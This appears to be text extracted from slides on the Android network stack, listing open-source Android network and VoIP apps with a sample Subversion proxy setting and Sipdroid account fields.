Jabber: [email protected]: M0ffe at freenode, Undernet and

Slashnet. wrr-linux-081114-2.6.27.patch.txt


Appendix: Open Source based Applications 1/2http://code.google.com/p/android-labs/wiki/NetMeterNetMeter allows to trouble-shoot performance problems by letting the user see network and CPU usage over time.

http://www.jaqpot.net/netcounter/NetCounter is a network traffic counter for the Android platform. GPLv3 license

# for Proxy-based network usersinvain$sl6> vi ~/.subversion/servers[global]http-proxy-host = 200.200.200.200http-proxy-port = 8080


Android network testerhttp://code.google.com/p/androidnetworktester/Fast Network Tester for Android

Appendix: Open Source based Applications 2/2Free SIP/VoIP client for Android (GPLV3)http://code.google.com/p/sipdroid/http://serweb.iptel.org/user/reg/

• Autorization Username : your-iptel-ID

• Password : your-iptel-pass • Server of Proxy : sip.iptel.org• Domain : iptel.org• Port : 5060(default)• Protocol : UDP(default)• sip: [email protected] • sip: [email protected]

http://code.google.com/p/sipdroid/

android network stack and enhancement (3g/ wifi , ipv4/ipv6, sip/voip)

Documents